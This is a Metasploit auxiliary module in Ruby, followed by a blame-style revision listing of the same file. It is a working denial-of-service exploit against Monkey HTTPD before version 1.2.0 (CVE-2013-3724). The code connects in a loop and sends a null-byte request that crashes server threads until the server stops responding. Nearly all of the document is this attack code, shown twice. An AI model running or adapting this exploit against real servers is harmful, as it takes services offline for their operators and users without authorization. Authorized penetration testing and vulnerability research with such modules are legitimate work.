metasploit-framework/unstable-modules/auxiliary/dos/http/monkey_null.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Monkey HTTPD Null Byte Request',
			'Description'    => %q{
				Sending a request containing null bytes causes a
			thread to crash.  If you crash all of the threads,
			the server becomes useless.  Affects versions < 1.2.0.
			},
			'Author'         =>
				[
					'Doug Prostko <dougtko[at]gmail[dot]com>'
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['CVE', '2013-3724'],
				],
			'DisclosureDate' => 'May 25 2013'))

		register_options(
			[
				Opt::RPORT(2001),
				OptInt.new("TIMEOUT", [ false, "Set timeout for connectivity check", 10 ]),
			], self.class)
	end

	def is_alive
		connect
		sock.put("GET / HTTP/1.1\r\nHost:foo\r\n\r\n")
		if ! sock.get_once(-1, datastore['TIMEOUT'])
			raise ::Rex::ConnectionTimeout
		end
		disconnect
	end

	def run
		loop do
			begin
				is_alive
				connect
				print_status("Sending DoS packet to #{rhost}:#{rport}")
				sock.put("\x00 / \r\n\r\n")
				disconnect
				Rex.sleep(1)
			rescue ::Rex::ConnectionRefused
				print_status("Unable to connect to #{rhost}:#{rport}.")
				break
			rescue ::Errno::ECONNRESET
				print_status("DoS packet successful. #{rhost} not responding.")
				break
			rescue ::Rex::HostUnreachable
				print_status("Couldn't connect to #{rhost}:#{rport}.")
				break
			rescue ::Timeout::Error, ::Errno::EPIPE
				print_status("Timeout error connecting to #{rhost}:#{rport}.")
				break
			rescue ::Rex::ConnectionTimeout
				print_good("Monkey server is down!")
				break
			ensure
				disconnect
			end
		end
	end
end
added monkey_null 2013-05-24 22:28:50 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

changed to ::Remote::Tcp 2013-06-06 14:41:18 +00:00			`include Msf::Exploit::Remote::Tcp`
added monkey_null 2013-05-24 22:28:50 +00:00			`include Msf::Auxiliary::Dos`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Monkey HTTPD Null Byte Request',`
			`'Description' => %q{`
			`Sending a request containing null bytes causes a`
			`thread to crash. If you crash all of the threads,`
changed sleep to select. changed affected version from <= 1.2.0 to < 1.2.0 2013-06-06 21:20:23 +00:00			`the server becomes useless. Affects versions < 1.2.0.`
added monkey_null 2013-05-24 22:28:50 +00:00			`},`
			`'Author' =>`
			`[`
			`'Doug Prostko <dougtko[at]gmail[dot]com>'`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
fixed CVE line 2013-06-05 17:10:07 +00:00			`['CVE', '2013-3724'],`
added monkey_null 2013-05-24 22:28:50 +00:00			`],`
git rid of comma in disclosure date 2013-06-05 17:09:02 +00:00			`'DisclosureDate' => 'May 25 2013'))`
added monkey_null 2013-05-24 22:28:50 +00:00
			`register_options(`
			`[`
			`Opt::RPORT(2001),`
changed to ::Remote::Tcp 2013-06-06 14:41:18 +00:00			`OptInt.new("TIMEOUT", [ false, "Set timeout for connectivity check", 10 ]),`
added monkey_null 2013-05-24 22:28:50 +00:00			`], self.class)`
			`end`

			`def is_alive`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`connect`
changed to ::Remote::Tcp 2013-06-06 14:41:18 +00:00			`sock.put("GET / HTTP/1.1\r\nHost:foo\r\n\r\n")`
			`if ! sock.get_once(-1, datastore['TIMEOUT'])`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`raise ::Rex::ConnectionTimeout`
added monkey_null 2013-05-24 22:28:50 +00:00			`end`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`disconnect`
added monkey_null 2013-05-24 22:28:50 +00:00			`end`

			`def run`
			`loop do`
			`begin`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`is_alive`
added monkey_null 2013-05-24 22:28:50 +00:00			`connect`
			`print_status("Sending DoS packet to #{rhost}:#{rport}")`
changed to ::Remote::Tcp 2013-06-06 14:41:18 +00:00			`sock.put("\x00 / \r\n\r\n")`
added monkey_null 2013-05-24 22:28:50 +00:00			`disconnect`
use Rex.sleep instead of select 2013-06-07 02:19:42 +00:00			`Rex.sleep(1)`
added monkey_null 2013-05-24 22:28:50 +00:00			`rescue ::Rex::ConnectionRefused`
			`print_status("Unable to connect to #{rhost}:#{rport}.")`
... 2013-05-29 15:47:18 +00:00			`break`
added monkey_null 2013-05-24 22:28:50 +00:00			`rescue ::Errno::ECONNRESET`
			`print_status("DoS packet successful. #{rhost} not responding.")`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`break`
			`rescue ::Rex::HostUnreachable`
added monkey_null 2013-05-24 22:28:50 +00:00			`print_status("Couldn't connect to #{rhost}:#{rport}.")`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`break`
added monkey_null 2013-05-24 22:28:50 +00:00			`rescue ::Timeout::Error, ::Errno::EPIPE`
added print_status to last rescue 2013-06-05 17:11:16 +00:00			`print_status("Timeout error connecting to #{rhost}:#{rport}.")`
added configurable timeout to is_alive(). shuffled some exceptions around 2013-06-05 19:22:50 +00:00			`break`
			`rescue ::Rex::ConnectionTimeout`
			`print_good("Monkey server is down!")`
			`break`
			`ensure`
			`disconnect`
added monkey_null 2013-05-24 22:28:50 +00:00			`end`
			`end`
			`end`
			`end`